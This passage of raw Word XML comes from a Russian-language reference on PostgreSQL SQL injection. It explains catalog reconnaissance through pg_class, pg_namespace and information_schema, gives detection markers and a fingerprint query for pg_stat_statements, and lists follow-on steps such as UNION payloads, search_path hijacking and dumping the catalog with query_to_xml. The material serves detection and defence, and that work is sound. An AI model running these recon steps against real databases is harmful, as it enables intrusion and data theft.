          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'schema.table'::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это вызов специального input-парсера типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который ищет relation в каталоге и возвращает OID. Используется потому, что прямой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE attrelid = (SELECT oid FROM pg_class WHERE ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> длиннее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A79F295" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload C) — view поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, дополненные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-фильтрами в WHERE. Эти фильтры применяются на этапе планировщика, поэтому через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> видны только объекты, доступные текущей роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C1EDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018CADE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14–17 (структура каталогов стабильна с 7.x; добавляются новые колонки в новых major, но используемые здесь — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relkind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relnamespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nspname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attnum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atttypid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atttypmod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attisdropped</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — есть везде).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B8488" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и доступен без квалификатора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A884619" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F60E1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает при любых дефолтах. Известные исключения: managed PG, где провайдер отдельно ограничивает доступ — практически никогда не делается, потому что приложения и ORM (Django, SQLAlchemy, Hibernate) активно используют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для миграций и introspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328850FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297EDAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Запросы к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти всегда атака. Легитимный код приложения обращается к каталогам в двух местах: на старте — миграции (Alembic, Flyway) проверяют наличие таблиц; на каждом запросе — это не должно происходить. Маркер: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли в момент, когда миграции не выполняются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985D1AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   ORM иногда генерирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-запросы при reflection (SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table('users', autoload_with=engine)</w:t>
      </w:r>
      <w:r>
        <w:t>). Маркер легитимности: запрос имеет жёстко зашитую WHERE (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relname = $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, без UNION, без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); атака — UNION или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT IN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> массовая выборка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9ACCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity.query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли — JOIN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relkind = 'r'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и широкой выборкой — атака. Это паттерн именно разведки структуры, а не точечной проверки одной таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6C481" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после нормализации payload-а — запись вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT $1, n.nspname || $2 || c.relname, $3 FROM pg_class c JOIN pg_namespace n ON c.relnamespace = n.oid WHERE c.relkind = $4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — характерный отпечаток recon-payload-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD8445" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Атака через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload C) от application-роли — то же правило: точечные запросы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_name = $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — норма для ORM; широкая выборка с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT IN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — recon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A282B33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E1F17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без изменений. Структура трёх ключевых каталогов стабильна с PG 7.x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CB8DD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AWS RDS / Google Cloud SQL / Supabase — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступны как PUBLIC во всех конфигурациях. Провайдеры не ограничивают каталоги, потому что это сломает все ORM и инструменты миграции. Единственное отличие на managed: список таблиц включает служебные таблицы провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на RDS, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqladmin.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на Google Cloud SQL) — атакующий видит их сразу, что само по себе fingerprint managed-инстанса. Детально по провайдерам — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D852A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA731A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после разведки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий строит UNION-payload с правильным числом и типами колонок для целевой таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE73ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для аналогичной разведки функций (имена, языки, владельцы).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67122FE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — fingerprinting версии PG для выбора применимых CVE из раздела 4. На практике 3.8.4 идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.8.1, чтобы заранее знать, есть ли в кластере специфические для PG 17 каталоги (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_subscription</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_replication_origin</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC38A0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT * FROM pg_catalog.pg_class', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — массовый дамп через один XML-вызов, если по какой-то причине нужно одной командой утащить всю карту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B940138" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hijacking — после разведки через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий знает все схемы, где есть его CREATE-права (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace.nspacl</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FF9BC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> детектора чтения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
